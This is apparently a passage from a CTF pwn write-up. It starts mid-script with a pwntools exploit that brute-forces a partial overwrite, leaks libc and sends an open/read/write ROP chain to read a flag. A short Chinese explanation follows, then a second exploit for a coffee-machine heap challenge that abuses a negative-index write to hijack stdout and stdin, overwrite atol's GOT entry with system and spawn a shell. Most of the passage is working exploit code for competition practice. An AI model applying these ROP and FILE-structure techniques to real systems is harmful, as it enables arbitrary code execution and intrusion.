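    # loop brute-forces.
    payload = p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(elf.got['alarm']) + p64(0) + b'\xf5\x54\x4A'
    p.send(payload)
    sleep(0.1)

    # Trampoline at 0x601038: after the leak, read the final chain to 0x601068.
    payload = p64(pop_rdi) + p64(0) + p64(pop_rsi_r15) + p64(0x601068) + p64(0) + p64(elf.plt['read'])
    p.send(payload)
    sleep(0.1)

    # Exactly one byte for the read() into `null`: read returns 1, so rax == 1
    # == SYS_write when execution reaches the syscall gadget, giving
    # write(1, alarm@got, ...) and thus the libc leak.
    p.send(b'0')
    sleep(0.1)

    try:
        libc_base = u64(p.recvuntil(b'\x7F')[-6:].ljust(8, b'\x00')) - libc.symbols['alarm']
        log.info(f'libc_base: {hex(libc_base)}')
    except Exception as exc:  # wrong guess: no leak, connection usually dies
        log.warning(f'attempt failed: {exc!r}')
        p.close()
        return False

    # offsets in this libc build
    pop_rdx = libc_base + 0x1B96
    open_addr = libc_base + 0x10FBF0
    write_addr = libc_base + 0x1100F0
    read_addr = libc_base + 0x110020
    # the chain below is 0xB0 bytes, so the appended "flag\0" string lands at
    # 0x601068 + 0xB0 = 0x601118
    flag = 0x601118

    # open("flag", 0); read(3, bss2, 0x30); write(1, bss2, 0x30)
    payload = p64(pop_rdi) + p64(flag) + p64(pop_rsi_r15) + p64(0) + p64(0) + p64(open_addr)
    payload += p64(pop_rdi) + p64(3) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(read_addr)
    payload += p64(pop_rdi) + p64(1) + p64(pop_rsi_r15) + p64(0x6010A0) + p64(0) + p64(pop_rdx) + p64(0x30) + p64(write_addr)
    payload += b"flag\x00\x00\x00"
    sleep(0.1)
    p.sendline(payload)
    p.interactive()
    return True


while True:
    p = remote("172.10.0.8", 9999)
    if start(p):
        break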
# Pwn-Auto_Coffee_machine
本题是一个菜单堆题，存在 UAF，可以打 tcache bin attack；也有非预期解：下标没有做负数检查，可以用负下标越界写到 libc 里的 stdout 结构体，通过 IO leak 泄露 libc；再改写 stdin 结构体的缓冲区指针实现任意地址写，把 atol 的 GOT 表项改为 system，最后输入 `sh` 即可拿到 shell。
from tools import *

context.log_level = 'debug'
p, e, libc = load('pwn', "172.10.0.9:8888")


def choose(option):
    """Answer the next '>>>' menu prompt."""
    p.sendlineafter(">>>", str(option))


def write_slot(index, data):
    """Menu path 2 -> 3 -> index, then raw data.  A negative index reaches the
    libc stdio structs that sit below the array (the OOB this solve abuses)."""
    choose(2)
    choose(3)
    choose(index)
    p.send(data)


# admin login; the two qwords spell b"just pwn it" little-endian
choose(4421)
admin_password = p64(0x6e7770207473756a) + p64(0x746920)
p.sendafter("please input the admin password\n", admin_password)

# 1) stdout: flags 0xfbad1887, zero the read pointers and clobber the low byte
#    of _IO_write_base so the next flush leaks libc pointers
write_slot(-107 - 14 + 76, p64(0xfbad1887) + p64(0) * 3 + b'\x00')
# 0x1ec980: presumably the offset of the leaked stdio pointer in the target's
# libc build - re-derive for any other libc
libc_base = recv_libc() - 0x1ec980

# 2) stdin: point _IO_buf_base/_IO_buf_end at [0x406068, 0x406070) so the next
#    read from stdin writes 8 bytes there (the atol GOT entry per the write-up)
stdin_fsop = p64(0xfbad1800) + p64(0) * 6 + p64(0x406068) + p64(0x406070) + b'\x00'
write_slot(-107 - 14 + 76 + 2, stdin_fsop)

# 3) trigger the read into the redirected stdin buffer with system's address
choose(3)
choose(1)
p.sendlineafter("input the id of what coffee you want to buy\n", str(1))
p.sendafter("Do you want to add something?Y/N\n", 'Y')
p.send(p64(libc_base + libc.symbols['system']))

# atol("sh") is now system("sh")
p.sendline("sh\x00")
p.interactive()